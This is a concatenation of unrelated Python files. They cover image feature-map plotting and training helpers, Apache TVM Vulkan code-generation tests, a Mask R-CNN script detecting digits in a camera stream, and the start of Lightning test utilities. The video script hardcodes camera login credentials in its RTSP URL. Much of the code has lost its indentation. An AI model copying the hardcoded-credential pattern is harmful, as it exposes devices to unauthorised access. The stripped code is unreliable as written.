img = PIL.Image.fromarray(img)
return img
def _smart_resize(img, thumb_size):
max_dim = np.argmax(img.size)
scale = thumb_size/img.size[max_dim]
new_size = (int(img.size[0]*scale), int(img.size[1]*scale))
    img = img.resize(new_size, PIL.Image.LANCZOS)  # ANTIALIAS was removed in recent Pillow; LANCZOS is the same filter
return img
def get_all_files(folder, extension=None):
all_files = []
for root, dirs, files in os.walk(folder):
for file in files:
            if (extension and file.endswith(extension)) or extension is None:
                try:
                    PIL.Image.open(os.path.join(root, file))  # If PIL can't open it we don't want it
                    all_files.append(f'{root}/{file}')
                except Exception:
                    continue
return all_files
def new_dir(folder):
if not os.path.exists(folder): os.makedirs(folder)
def plot_features(files, features, num_datapoints=None, thumb_size=32, thumbs=None, num_workers=32, html=False, grid=False):
if num_datapoints is None:
assert features.shape[0] == len(files)
num_datapoints = len(files)
if grid:
print('Computing grid')
# https://gist.github.com/vmarkovtsev/74e3a973b19113047fdb6b252d741b42
# https://github.com/gatagat/lap
gs = floor(sqrt(features.shape[0]))
samples = gs*gs # Determine number of data points to keep
print(f'Grid size: {gs}x{gs}, samples: {samples}')
# Cut excess data points
files = files[:samples]
features = features[:samples]
# Make grid
grid = np.dstack(np.meshgrid(np.linspace(0, 1, gs), np.linspace(0, 1, gs))).reshape(-1, 2)
cost_matrix = cdist(grid, features, "sqeuclidean").astype(np.float32)
cost, row_asses, col_asses = lap.lapjv(cost_matrix)
features = grid[col_asses]
if html:
html_map = []
# Generate thumbnails
if thumbs is None:
print('Generating thumbnails in parallel')
thumbs = _thumbnails_parallel(files, thumb_size, num_workers)
# Find max. and min. feature values
value_max = np.max(features)
value_min = np.min(features)
# Determine max possible grid size
gs = thumb_size * floor(sqrt(num_datapoints))
# Calculate size of the plot based on these values
canvas_size = int((abs(value_max) + abs(value_min)) * gs) + thumb_size # Images are anchored at upper left corner
# Define plot as empty (white) canvas
canvas = np.ones((canvas_size, canvas_size, 3), dtype=np.uint8) * 255
print('Plotting image')
for i, file in enumerate(files):
img = thumbs[file]
# Read features and calculate x,y
y = int((features[i,0] + abs(value_min)) * gs)
x = int((features[i,1] + abs(value_min)) * gs)
# Plot image
canvas[y:y+img.shape[0],x:x+img.shape[1],:] = img
if html:
# Add to HTML map area list
mapstring = f'<area shape="rect" coords="{x},{y},{x + img.shape[1]},{y + img.shape[0]}" href="{files[i]}" alt=""/>'
html_map.append(mapstring)
if html:
# Return plot and HTML map area list
print('Writing HTML map')
return canvas, html_map, thumbs
else:
return canvas, thumbs
def _thumbnails_parallel(files, thumb_size, num_workers):
    d = dict()
    q = Queue()
    def _worker(thumb_size, d):
        while True:
            file = q.get()
            d[file] = np.array(_smart_resize(load_img(file), thumb_size))
            q.task_done()
    for i in range(num_workers):
        worker = threading.Thread(target=_worker, args=(thumb_size, d,))
        worker.daemon = True  # Thread dies when main thread (only non-daemon thread) exits.
        worker.start()
for file in files:
q.put(file)
q.join()
return d
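# A minimal sketch of driving plot_features, assuming a folder of JPEG images and an
# (N, 2) embedding such as a UMAP projection of per-image feature vectors; the folder
# name and the random stand-in features are illustrative only.
def _example_plot_feature_map(folder='my_images', thumb_size=32):
    files = get_all_files(folder, extension='.jpg')
    vectors = np.random.rand(len(files), 512)  # stand-in for real feature vectors
    embedding = umap.UMAP(n_components=2).fit_transform(vectors)
    # Squash coordinates into a compact 0..1 range so the canvas stays small
    embedding = (embedding - embedding.min(0)) / (embedding.max(0) - embedding.min(0))
    canvas, thumbs = plot_features(files, embedding, thumb_size=thumb_size)
    show_img(canvas)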
class UnsupervisedImageDataset(t.utils.data.Dataset):
def __init__(self, folder, extension=None, transforms=None):
self.folder = folder
self.transforms = transforms
self.files = get_all_files(folder, extension)
def __len__(self):
return len(self.files)
def __getitem__(self, idx):
if t.is_tensor(idx):
idx = idx.tolist()
sample = load_img(self.files[idx])
if self.transforms:
sample = self.transforms(sample)
return sample
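# A minimal sketch of consuming UnsupervisedImageDataset with a DataLoader to extract
# per-image features from a pretrained backbone; the folder path, transform pipeline,
# and choice of ResNet-18 are illustrative assumptions.
def _example_feature_extraction(folder='my_images', batch_size=32):
    transforms = tv.transforms.Compose([
        tv.transforms.Resize((224, 224)),
        tv.transforms.ToTensor(),
        tv.transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
    ])
    dataset = UnsupervisedImageDataset(folder, extension='.jpg', transforms=transforms)
    loader = t.utils.data.DataLoader(dataset, batch_size=batch_size, shuffle=False)
    model = tv.models.resnet18(pretrained=True)
    model.fc = nn.Identity()  # drop the classifier head, keep pooled features
    model.eval()
    features = []
    with t.no_grad():
        for batch in tqdm(loader):
            features.append(from_device(model(batch)))
    return np.concatenate(features)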
def train_model(model, dataloaders, criterion, optimizer, device, epochs):
best_model_wts = copy.deepcopy(model.state_dict())
best_acc = 0.0
for epoch in range(epochs):
print(f'Epoch {epoch}/{epochs-1}')
print('-' * 10)
# Each epoch has a training and validation phase
for phase in ['train', 'val']:
if phase == 'train':
model.train() # Set model to training mode
else:
model.eval() # Set model to evaluate mode
running_loss = 0.0
running_corrects = 0
# Iterate over data.
for inputs, labels in dataloaders[phase]:
inputs = inputs.to(device)
labels = labels.to(device)
# Zero the parameter gradients
optimizer.zero_grad()
# Forward
# Track history if only in train
with t.set_grad_enabled(phase == 'train'):
outputs = model(inputs)
_, preds = t.max(outputs, 1)
loss = criterion(outputs, labels)
# backward + optimize only if in training phase
if phase == 'train':
loss.backward()
optimizer.step()
# Statistics
running_loss += loss.item() * inputs.size(0)
running_corrects += t.sum(preds == labels.data)
epoch_loss = running_loss / len(dataloaders[phase].dataset)
epoch_acc = running_corrects.double() / len(dataloaders[phase].dataset)
print(f'{phase} loss: {epoch_loss:.4f} Acc: {epoch_acc:.4f}')
# Deep copy the model
if phase == 'val' and epoch_acc > best_acc:
best_acc = epoch_acc
best_model_wts = copy.deepcopy(model.state_dict())
    print(f'Best val acc: {best_acc:.4f}')
# Load best model weights
model.load_state_dict(best_model_wts)
return model
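# A minimal sketch of wiring train_model together with ImageFolder datasets; the data
# paths, backbone, and hyperparameters are illustrative assumptions.
def _example_finetune(train_folder='data/train', val_folder='data/val', num_classes=10):
    tfms = tv.transforms.Compose([tv.transforms.Resize((224, 224)), tv.transforms.ToTensor()])
    dataloaders = {
        phase: t.utils.data.DataLoader(
            tv.datasets.ImageFolder(folder, transform=tfms),
            batch_size=32, shuffle=(phase == 'train')
        )
        for phase, folder in (('train', train_folder), ('val', val_folder))
    }
    device = t.device('cuda' if t.cuda.is_available() else 'cpu')
    model = tv.models.resnet18(pretrained=True)
    model.fc = nn.Linear(model.fc.in_features, num_classes)
    model = model.to(device)
    criterion = nn.CrossEntropyLoss()
    optimizer = t.optim.SGD(model.parameters(), lr=1e-3, momentum=0.9)
    return train_model(model, dataloaders, criterion, optimizer, device, epochs=5)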
|
test_target_codegen_vulkan.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import random
import re
import threading
import numpy as np
import pytest
import tvm
import tvm.testing
from tvm import relay, te
from tvm.topi.math import cast
def randint_loguniform(low=1, high=32768, size=None):
logN = np.random.uniform(low=np.log(low), high=np.log(high), size=size)
N = np.exp(logN).astype(int)
return np.unique(N)
dtype = tvm.testing.parameter("float32", "int32", "float16", "int8")
fuzz_arr_size = tvm.testing.parameter(*randint_loguniform(size=25))
# Explicitly specify a target, as this test is looking at the
# generated shader code, and is not running on an actual device.
@tvm.testing.parametrize_targets(
" ".join(
[
"vulkan",
"-supports_int8=1",
"-supports_8bit_buffer=1",
"-supports_storage_buffer_storage_class=1",
"-supports_float16=1",
"-supports_16bit_buffer=1",
]
)
)
def test_vector_comparison(target, dtype):
n = (1024,)
A = te.placeholder(n, dtype=dtype, name="A")
B = te.compute(
A.shape,
lambda i: tvm.tir.Select(
A[i] >= 0, A[i] + tvm.tir.const(1, dtype), tvm.tir.const(0, dtype)
),
name="B",
)
s = te.create_schedule(B.op)
(bx, tx) = s[B].split(s[B].op.axis[0], factor=128)
(tx, vx) = s[B].split(tx, factor=4)
s[B].bind(bx, te.thread_axis("blockIdx.x"))
s[B].bind(tx, te.thread_axis("threadIdx.x"))
s[B].vectorize(vx)
f = tvm.build(s, [A, B], target)
# Verify we generate the boolx4 type declaration and the OpSelect
# v4{float,half,int} instruction
assembly = f.imported_modules[0].get_source()
matches = re.findall("%v4bool = OpTypeVector %bool 4", assembly)
assert len(matches) == 1
matches = re.findall("OpSelect %v4.*", assembly)
assert len(matches) == 1
def test_array_copy(dev, dtype, fuzz_arr_size):
a_np = np.random.uniform(size=(fuzz_arr_size,)).astype(dtype)
a = tvm.nd.empty((fuzz_arr_size,), dtype, dev).copyfrom(a_np)
b_np = a.numpy()
tvm.testing.assert_allclose(a_np, b_np)
tvm.testing.assert_allclose(a_np, a.numpy())
@tvm.testing.exclude_targets("llvm")
def test_array_vectorize_add(target, dev, dtype):
arr_size = 64
lanes = 2
num_thread = 8
A = te.placeholder((arr_size,), name="A", dtype="%sx%d" % (dtype, lanes))
B = te.compute((arr_size,), lambda i: A[i] + tvm.tir.const(1, A.dtype), name="B")
s = te.create_schedule(B.op)
xo, xi = s[B].split(B.op.axis[0], factor=num_thread)
s[B].bind(xo, te.thread_axis("blockIdx.x"))
s[B].bind(xi, te.thread_axis("threadIdx.x"))
fun = tvm.build(s, [A, B], target)
a = tvm.nd.empty((arr_size,), A.dtype, dev).copyfrom(np.random.uniform(size=(arr_size, lanes)))
c = tvm.nd.empty((arr_size,), B.dtype, dev)
fun(a, c)
tvm.testing.assert_allclose(c.numpy(), a.numpy() + 1)
@tvm.testing.parametrize_targets("vulkan")
def test_vulkan_stress(target, dev):
"""
Launch a randomized test with multiple kernels per stream, multiple uses of
kernels per stream, over multiple threads.
"""
n = 1024
num_thread = 64
def run_stress():
def worker():
A = te.placeholder((n,), name="A", dtype="float32")
B = te.placeholder((n,), name="B", dtype="float32")
functions = [
(
lambda: te.compute((n,), lambda i: 2 * A[i] + 3 * B[i]),
lambda a, b: 2 * a + 3 * b,
),
(lambda: te.compute((n,), lambda i: A[i] + B[i]), lambda a, b: a + b),
(lambda: te.compute((n,), lambda i: A[i] + 2 * B[i]), lambda a, b: a + 2 * b),
]
def build_f(f_ref):
(C_f, ref) = f_ref
C = C_f()
s = te.create_schedule(C.op)
xo, xi = s[C].split(C.op.axis[0], factor=num_thread)
s[C].bind(xo, te.thread_axis("blockIdx.x"))
s[C].bind(xi, te.thread_axis("threadIdx.x"))
fun = tvm.build(s, [A, B, C], target)
return (fun, ref)
fs = [
build_f(random.choice(functions)) for _ in range(np.random.randint(low=1, high=10))
]
a = tvm.nd.empty((n,), A.dtype, dev).copyfrom(np.random.uniform(size=(n,)))
b = tvm.nd.empty((n,), B.dtype, dev).copyfrom(np.random.uniform(size=(n,)))
cs = [tvm.nd.empty((n,), A.dtype, dev) for _ in fs]
for ((f, _), c) in zip(fs, cs):
f(a, b, c)
for ((_, ref), c) in zip(fs, cs):
tvm.testing.assert_allclose(c.numpy(), ref(a.numpy(), b.numpy()))
ts = [threading.Thread(target=worker) for _ in range(np.random.randint(1, 10))]
for t in ts:
t.start()
for t in ts:
t.join()
run_stress()
@tvm.testing.exclude_targets("llvm")
def test_vulkan_bool_load(target, dev):
arr_size = 1024
target = tvm.target.Target(target)
if target.kind.name == "vulkan":
supports_int8_buffer = target.attrs.get("supports_int8", False) and target.attrs.get(
"supports_8bit_buffer", False
)
if not supports_int8_buffer:
pytest.xfail(
"Vulkan target does not support int8 buffer access, used to transfer booleans"
)
def do_copy(A, B, n):
ib = tvm.tir.ir_builder.create()
A = ib.buffer_ptr(A)
B = ib.buffer_ptr(B)
tx = te.thread_axis("threadIdx.x")
bx = te.thread_axis("blockIdx.x")
max_threads = 32
ib.scope_attr(bx, "thread_extent", tvm.tir.indexdiv(n + max_threads - 1, max_threads))
ib.scope_attr(tx, "thread_extent", max_threads)
tid = bx * max_threads + tx
with ib.if_scope(tid < n):
B[tid] = cast(A[tid], "int32")
return ib.get()
A = te.placeholder((arr_size,), name="A", dtype="bool")
B = te.placeholder((arr_size,), name="B", dtype="int32")
B = te.extern(
A.shape,
[A],
lambda ins, outs: do_copy(ins[0], outs[0], arr_size),
name="bool_copy_ir",
dtype="int32",
)
s = te.create_schedule(B.op)
with tvm.transform.PassContext(opt_level=3):
func = tvm.build(s, [A, B], target)
a_np = np.random.uniform(size=arr_size) > 0.5
b_np = np.zeros((arr_size,), dtype="int32")
a = tvm.nd.array(a_np, dev)
b = tvm.nd.array(b_np, dev)
func(a, b)
ref = a_np.astype(np.int32)
tvm.testing.assert_allclose(b.numpy(), ref)
def check_mod(target, dev, mod, x_np, res_np):
res = relay.create_executor("vm", mod=mod, device=dev, target=target).evaluate()(x_np).numpy()
tvm.testing.assert_allclose(res, res_np, atol=1e-5)
def test_sqrt(target, dev):
# Three 32 bit pushconstants: any_dim, stride, stride
dtype = "float32"
x = relay.var("x", shape=(relay.Any(),), dtype=dtype)
mod = tvm.IRModule()
mod["main"] = relay.Function([x], relay.sqrt(x))
x_np = np.random.uniform(size=(10,)).astype(dtype)
res_np = np.sqrt(x_np)
check_mod(target, dev, mod, x_np, res_np)
def test_argsort(target, dev):
# One 64 bit and one 32 bit constants
dtype = "int32"
x = relay.var("x", shape=(relay.Any(),), dtype=dtype)
mod = tvm.IRModule()
mod["main"] = relay.Function([x], relay.argsort(x))
x_np = np.random.randint(0, high=10, size=(10,)).astype(dtype)
res_np = np.argsort(x_np)
check_mod(target, dev, mod, x_np, res_np)
def test_cumsum(target, dev):
# One 64 bit and one 32 bit constants
dtype = "int32"
x = relay.var("x", shape=(relay.Any(),), dtype=dtype)
mod = tvm.IRModule()
mod["main"] = relay.Function([x], relay.cumsum(x))
x_np = np.random.randint(0, high=10, size=(10,)).astype(dtype)
res_np = np.cumsum(x_np)
check_mod(target, dev, mod, x_np, res_np)
def test_unique(target, dev):
dtype = "int32"
x = relay.var("x", shape=(relay.Any(),), dtype=dtype)
mod = tvm.IRModule()
[unique, _, _, num_unique] = relay.unique(x, is_sorted=True)
mod["main"] = relay.Function([x], relay.op.strided_slice(unique, begin=[0], end=num_unique))
x_np = np.random.randint(0, high=10, size=(10,)).astype(dtype)
res_np = np.unique(x_np)
check_mod(target, dev, mod, x_np, res_np)
vulkan_parameter_impl = tvm.testing.parameter("push_constants", "ubo")
vulkan_parameter_dtype = tvm.testing.parameter("int32", "float32", "int64")
# Only run on vulkan because extremely large numbers of input
# parameters can crash cuda/llvm compiler.
@tvm.testing.parametrize_targets("vulkan -from_device=0")
def test_vulkan_constant_passing(target, dev, vulkan_parameter_impl, vulkan_parameter_dtype):
target = tvm.target.Target(target)
dtype = vulkan_parameter_dtype
if not target.attrs.get("supports_int64", False):
pytest.xfail("Vulkan target does not support Int64 variables")
# f_add has 3+num_int_params scalar parameters. The other three
# are length_n, stride1, and stride2.
if vulkan_parameter_impl == "push_constants":
# 4 params, 32 bytes. Within 128-byte spec-guaranteed size of
# push constants. Uses push constants.
num_int_params = 1
else:
# 24 params, 192 bytes. May be above spec-guaranteed size of 128
# bytes for push constants. Uses either push constants or UBO,
# depending on the device.
max_push_constants_size = int(target.attrs.get("max_push_constants_size", 128))
max_int_params_in_push = max_push_constants_size // 8 - 3
num_int_params = max_int_params_in_push + 1
n = te.var("n")
scalars = [te.var("scale{}".format(i), dtype=dtype) for i in range(num_int_params)]
scalar_sum = scalars[0]
for s in scalars[1:]:
scalar_sum += s
A = te.placeholder((n,), name="A", dtype=dtype)
B = te.compute(A.shape, lambda i: scalar_sum + A[i], name="B")
s = te.create_schedule(B.op)
xo, xi = s[B].split(B.op.axis[0], factor=64)
s[B].bind(xo, te.thread_axis("blockIdx.x"))
s[B].bind(xi, te.thread_axis("threadIdx.x"))
f_add = tvm.build(s, scalars + [A, B], target)
n = 1024
scalars = np.array([1 for _ in scalars]).astype(dtype)
a = tvm.nd.array(np.random.uniform(size=n).astype(A.dtype), dev)
b = tvm.nd.array(np.zeros(n, dtype=B.dtype), dev)
f_add(*scalars, a, b)
tvm.testing.assert_allclose(a.numpy() + sum(scalars), b.numpy())
def test_vulkan_while_if(target, dev):
target = tvm.target.Target(target)
def do_compute(A, B, n):
ib = tvm.tir.ir_builder.create()
A = ib.buffer_ptr(A)
B = ib.buffer_ptr(B)
if "gpu" in target.keys:
ib.scope_attr(te.thread_axis("blockIdx.x"), "thread_extent", 0)
iterations = ib.allocate("int32", (1,), name="iterations", scope="local")
iterations[0] = 0
B[0] = 0
# WhileNode's condition is re-evaluated every loop. The
# if_then_else block introduces additional labels/blocks that
# must be kept separate from the WhileNode's block.
loop_condition = iterations[0] < tvm.tir.if_then_else(A[0] > 0, 10, 20)
with ib.while_loop(loop_condition):
iterations[0] += 1
B[0] += iterations[0]
return ib.get()
n = 1
dtype = "int32"
A = te.placeholder((n,), name="A", dtype=dtype)
B = te.extern(
A.shape,
[A],
lambda ins, outs: do_compute(ins[0], outs[0], n),
dtype=dtype,
)
s = te.create_schedule(B.op)
# Point of failure would be here, at tvm.build.
with tvm.transform.PassContext(opt_level=3):
func = tvm.build(s, [A, B], target)
a = tvm.nd.array(np.array([5], dtype=A.dtype), dev)
b = tvm.nd.array(np.zeros(n, dtype=A.dtype), dev)
func(a, b)
tvm.testing.assert_allclose(b.numpy(), [55])
a = tvm.nd.array(np.array([-5], dtype=A.dtype), dev)
b = tvm.nd.array(np.zeros(n, dtype=A.dtype), dev)
func(a, b)
tvm.testing.assert_allclose(b.numpy(), [210])
@tvm.testing.exclude_targets("llvm")
def test_vulkan_local_threadidx(target, dev):
# To access the thread index, the vulkan runtime accesses a global
# array of thread indices, storing the result in a local variable.
# In CUDA, these are the built-in threadIdx.x variables, which are
# globally accessible. In vulkan, these local variables must be
# defined inside a function, but are hoisted up to the function
# header to mimic the global CUDA semantics. Before this
# hoisting, this test could trigger spvValidate errors for
# potentially undeclared variables.
def do_compute(A, B, n):
ib = tvm.tir.ir_builder.create()
A = ib.buffer_ptr(A)
B = ib.buffer_ptr(B)
# One single declaration of te.thread_axis.
tx = te.thread_axis("threadIdx.x")
with ib.for_range(0, 1):
# Used inside a for-loop scope, defines local thread_id
# variable.
ib.scope_attr(tx, "thread_extent", 16)
B[tx + 0] = A[tx + 0]
with ib.for_range(0, 1):
# Used in next scope. If local variable defined at point
# of use instead of function header, will fail spvValidate
# for access of out-of-scope local variable.
ib.scope_attr(tx, "thread_extent", 16)
B[tx + 16] = A[tx + 16]
return ib.get()
n = te.var("n")
A = te.placeholder((n,), name="A", dtype="int32")
B = te.placeholder((n,), name="B", dtype="int32")
B = te.extern(
A.shape,
[A],
lambda ins, outs: do_compute(ins[0], outs[0], n),
dtype="int32",
)
s = te.create_schedule(B.op)
# Expected failure occurs at build step.
func = tvm.build(s, [A, B], target)
n = 32
a_np = np.arange(n).astype(dtype=A.dtype)
b_np = np.zeros((n,), dtype="int32")
a = tvm.nd.array(a_np, dev)
b = tvm.nd.array(b_np, dev)
func(a, b)
tvm.testing.assert_allclose(b.numpy(), a_np)
class TestVectorizedIndices:
load_type, store_type = tvm.testing.parameters(
# Load N values, write to N locations.
# Vectorized copy.
("ramp", "ramp"),
# Load 1 value, write to N locations.
# Scalar load, vectorized store.
#
# Most TVM operations (e.g. schedule[tensor].vectorize(axis)) have
# the broadcast outside of the index, but it is semantically okay
# for the broadcast to be inside the index, and it shows up with
# some optimizations.
("broadcast", "ramp"),
        # Load 1 value, write to 1 location.
# Broadcasting on both sides should be equivalent to a scalar copy.
("broadcast", "broadcast"),
# Loads N values, write to 1 location.
# Disabled as it would have unclear semantics.
# ("ramp","broadcoast"),
)
indirect_indices = tvm.testing.parameter(True, False, ids=["reorder", "no_reorder"])
@tvm.testing.fixture
def ref_data(self, load_type, store_type, indirect_indices):
n = 4
index_map = {
"ramp": np.arange(n),
"broadcast": np.zeros(n, dtype="int32"),
}
a_np = np.random.randint(np.iinfo("int32").max, size=n).astype("int32")
b_np = np.zeros(shape=n, dtype=a_np.dtype)
reorder_np = np.arange(n, dtype="int32")[::-1]
load_index = index_map[load_type]
store_index = index_map[store_type]
if indirect_indices:
load_index = reorder_np[load_index]
b_np[store_index] = a_np[load_index]
return a_np, reorder_np, b_np
@tvm.testing.fixture
def mod(self, target, load_type, store_type, indirect_indices):
target = tvm.target.Target(target)
n = 4
dtype = "int32"
A = te.placeholder((n,), dtype=dtype, name="A")
R = te.placeholder((n,), dtype=dtype, name="R")
def do_compute(ins, outs):
ib = tvm.tir.ir_builder.create()
A, R = map(ib.buffer_ptr, ins)
B = ib.buffer_ptr(outs[0])
if "gpu" in target.keys:
ib.scope_attr(te.thread_axis("blockIdx.x"), "thread_extent", 0)
index_map = {
"ramp": tvm.tir.Ramp(0, 1, 4),
"broadcast": tvm.tir.Broadcast(0, 4),
}
load_index = index_map[load_type]
store_index = index_map[store_type]
if indirect_indices:
load_index = R[load_index]
B[store_index] = A[load_index]
return ib.get()
B = te.extern(A.shape, [A, R], do_compute, dtype="int32")
s = te.create_schedule(B.op)
return tvm.lower(s, [A, R, B])
def test_ramp_broadcast_index(self, target, dev, mod, ref_data):
f = tvm.build(mod, target=target)
a_np, reorder_np, b_np = ref_data
a = tvm.nd.array(a_np, dev)
r = tvm.nd.array(reorder_np, dev)
b = tvm.nd.array(np.zeros(shape=b_np.shape, dtype="int32"), dev)
f(a, r, b)
tvm.testing.assert_allclose(b.numpy(), b_np)
@tvm.testing.parametrize_targets("vulkan -max_shared_memory_per_block=16384")
def test_shared_mem_alloc(target, dev):
alloc_nbytes = 16384 * 2
def do_compute(ins, outs):
ib = tvm.tir.ir_builder.create()
out = ib.buffer_ptr(outs[0])
ib.scope_attr(te.thread_axis("blockIdx.x"), "thread_extent", 0)
array = ib.allocate("int32", (alloc_nbytes,), name="array", scope="shared")
array[0] = 0
out[0] = array[0]
return ib.get()
Out = te.extern(
shape=(1,),
inputs=[],
fcompute=do_compute,
dtype="int32",
)
s = te.create_schedule(Out.op)
# Codegen should raise error when allocating more memory than the
# target supports.
with pytest.raises(tvm.TVMError):
tvm.build(s, [Out], target)
if __name__ == "__main__":
import sys
sys.exit(pytest.main([__file__] + sys.argv[1:]))
|
test_video.py
|
import cv2
import numpy as np
import os
import sys
import random
import math
import skimage.io
import time
import matplotlib.pyplot as plt
import threading
import tensorflow as tf
ROOT_DIR = os.path.abspath("../../")
sys.path.append(ROOT_DIR)
from mrcnn import utils
import mrcnn.model as modellib
from mrcnn.config import Config
# To find local version
sys.path.append(os.path.join(ROOT_DIR, "samples/coco/"))
import coco
def random_colors(N):
np.random.seed(1)
colors = [tuple(255*np.random.rand(3)) for _ in range(N)]
return colors
def apply_mask(image, mask, color, alpha=0.5):
"""Apply the given mask to the image.
"""
for n, c in enumerate(color):
image[:, :, n] = np.where(
mask == 1,
image[:, :, n] * (1 - alpha) + alpha * c,
image[:, :, n]
)
return image
def display_instances(image, boxes, masks, ids, names, scores):
n_instances = boxes.shape[0]
if not n_instances:
print('No instances to display')
else:
assert boxes.shape[0] == masks.shape[-1] == ids.shape[0]
colors = random_colors(n_instances)
height, width = image.shape[:2]
for i, color in enumerate(colors):
if not np.any(boxes[i]):
continue
y1, x1, y2, x2 = boxes[i]
mask = masks[:, :, i]
image = apply_mask(image, mask, color)
image = cv2.rectangle(image, (x1, y1), (x2, y2), color, 2)
label = names[ids[i]]
score = scores[i] if scores is not None else None
caption = '{}{:.2f}'.format(label, score) if score else label
image = cv2.putText(
image, caption, (x1, y1), cv2.FONT_HERSHEY_COMPLEX, 0.7, color, 2
)
return image
if __name__ == '__main__':
MODEL_DIR = os.path.join(ROOT_DIR, "logs")
COCO_MODEL_PATH = os.path.join(MODEL_DIR, "mask_rcnn_my.h5")
if not os.path.exists(COCO_MODEL_PATH):
print('cannot find coco_model')
class InferenceConfig(Config):
        # Give the configuration a recognizable name; it is used when constructing the network
NAME = "shapes"
GPU_COUNT = 1
IMAGES_PER_GPU = 1
IMAGE_MIN_DIM = 768
IMAGE_MAX_DIM = 1280
# IMAGE_MIN_DIM = 1088
# IMAGE_MAX_DIM = 1920
# IMAGE_MIN_DIM = 576
# IMAGE_MAX_DIM = 704
        # Number of classes
        NUM_CLASSES = 1 + 10  # background + 10 digit classes
        # Controls the size of images used for detection
RPN_ANCHOR_SCALES = (8*6, 16*6, 32*6, 64*6, 128*6) # anchor side in pixels
config = InferenceConfig()
config.display()
# config2 = coco.CocoConfig()
# config2.display()
model = modellib.MaskRCNN(
mode="inference", model_dir=MODEL_DIR, config=config
)
# Load weights trained on MS-COCO
model.load_weights(COCO_MODEL_PATH, by_name=True)
# class_names = ['BG', 'person', 'bicycle', 'car', 'motorcycle', 'airplane',
# 'bus', 'train', 'truck', 'boat', 'traffic light',
# 'fire hydrant', 'stop sign', 'parking meter', 'bench', 'bird',
# 'cat', 'dog', 'horse', 'sheep', 'cow', 'elephant', 'bear',
# 'zebra', 'giraffe', 'backpack', 'umbrella', 'handbag', 'tie',
# 'suitcase', 'frisbee', 'skis', 'snowboard', 'sports ball',
# 'kite', 'baseball bat', 'baseball glove', 'skateboard',
# 'surfboard', 'tennis racket', 'bottle', 'wine glass', 'cup',
# 'fork', 'knife', 'spoon', 'bowl', 'banana', 'apple',
# 'sandwich', 'orange', 'broccoli', 'carrot', 'hot dog', 'pizza',
# 'donut', 'cake', 'chair', 'couch', 'potted plant', 'bed',
# 'dining table', 'toilet', 'tv', 'laptop', 'mouse', 'remote',
# 'keyboard', 'cell phone', 'microwave', 'oven', 'toaster',
# 'sink', 'refrigerator', 'book', 'clock', 'vase', 'scissors',
# 'teddy bear', 'hair drier', 'toothbrush']
class_names = ['BG', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
capture = cv2.VideoCapture(
"rtsp://admin:admin123@192.168.3.76:554/Streaming/Channels/1")
# capture.set(cv2.CAP_PROP_FRAME_WIDTH, 1280)
# capture.set(cv2.CAP_PROP_FRAME_HEIGHT, 720)
# capture.set(cv2.CAP_PROP_FRAME_WIDTH, 1366)
# capture.set(cv2.CAP_PROP_FRAME_HEIGHT, 768)
# capture.set(cv2.CAP_PROP_FRAME_WIDTH, 1920)
# capture.set(cv2.CAP_PROP_FRAME_HEIGHT, 1080)
# capture.set(cv2.CAP_PROP_FRAME_WIDTH, 1280)
# capture.set(cv2.CAP_PROP_FRAME_HEIGHT, 960)
# capture.set(cv2.CAP_PROP_FRAME_WIDTH, 704)
# capture.set(cv2.CAP_PROP_FRAME_HEIGHT, 576)
# capture.set(cv2.CAP_PROP_FRAME_WIDTH, 352)
# capture.set(cv2.CAP_PROP_FRAME_HEIGHT, 288)
graphNow = tf.get_default_graph()
def detectModel(model, frame):
        frame = cv2.resize(frame, (512, 512))
        print("Thread started", threading.current_thread().ident, frame.shape)
start = time.time()
with graphNow.as_default():
results = model.detect([frame], verbose=0)
r = results[0]
# frame = display_instances(
# frame, r['rois'], r['masks'], r['class_ids'],
# class_names, r['scores']
# )
end = time.time()
print("识别时间:")
print(end-start)
print("线程结束",threading.currentThread().ident)
t1 = None
i=0
    # Run detection once up front; the first detection takes noticeably longer
ret, frame = capture.read()
results = model.detect([frame], verbose=0)
while ret:
start = time.time()
ret, frame = capture.read()
        if t1 is None or not t1.is_alive():
# if i%7==0:
t1 = threading.Thread(target=detectModel, args=(model, frame))
t1.start()
i+=1
end = time.time()
# print("视频每帧时间:")
# print(end-start)
# cv2.imshow('frame', frame)
# if cv2.waitKey(1) & 0xFF == ord('q'):
# break
cv2.destroyAllWindows()
capture.release()
|
utils.py
|
from bitcoin.rpc import RawProxy as BitcoinProxy
from btcproxy import BitcoinRpcProxy
from collections import OrderedDict
from decimal import Decimal
from ephemeral_port_reserve import reserve
from lightning import LightningRpc
import json
import logging
import lzma
import math
import os
import random
import re
import shutil
import sqlite3
import string
import struct
import subprocess
import threading
import time
BITCOIND_CONFIG = {
"regtest": 1,
"rpcuser": "rpcuser",
"rpcpassword": "rpcpass",
}
LIGHTNINGD_CONFIG = OrderedDict({
"log-level": "debug",
"cltv-delta": 6,
"cltv-final": 5,
"watchtime-blocks": 5,
"rescan": 1,
'disable-dns': None,
})
with open('config.vars') as configfile:
config = dict([(line.rstrip().split('=', 1)) for line in configfile])
DEVELOPER = os.getenv("DEVELOPER", config['DEVELOPER']) == "1"
EXPERIMENTAL_FEATURES = os.getenv("EXPERIMENTAL_FEATURES", config['EXPERIMENTAL_FEATURES']) == "1"
# Gossip can be slow without DEVELOPER.
if DEVELOPER:
DEFAULT_TIMEOUT = 60
else:
DEFAULT_TIMEOUT = 180
TIMEOUT = int(os.getenv("TIMEOUT", str(DEFAULT_TIMEOUT)))
VALGRIND = os.getenv("VALGRIND", config['VALGRIND']) == "1"
SLOW_MACHINE = os.getenv("SLOW_MACHINE", "0") == "1"
COMPAT = os.getenv("COMPAT", config['COMPAT']) == "1"
def wait_for(success, timeout=TIMEOUT):
start_time = time.time()
interval = 0.25
while not success() and time.time() < start_time + timeout:
time.sleep(interval)
interval *= 2
if interval > 5:
interval = 5
if time.time() > start_time + timeout:
raise ValueError("Error waiting for {}", success)
def write_config(filename, opts, regtest_opts=None, section_name='regtest'):
with open(filename, 'w') as f:
for k, v in opts.items():
f.write("{}={}\n".format(k, v))
if regtest_opts:
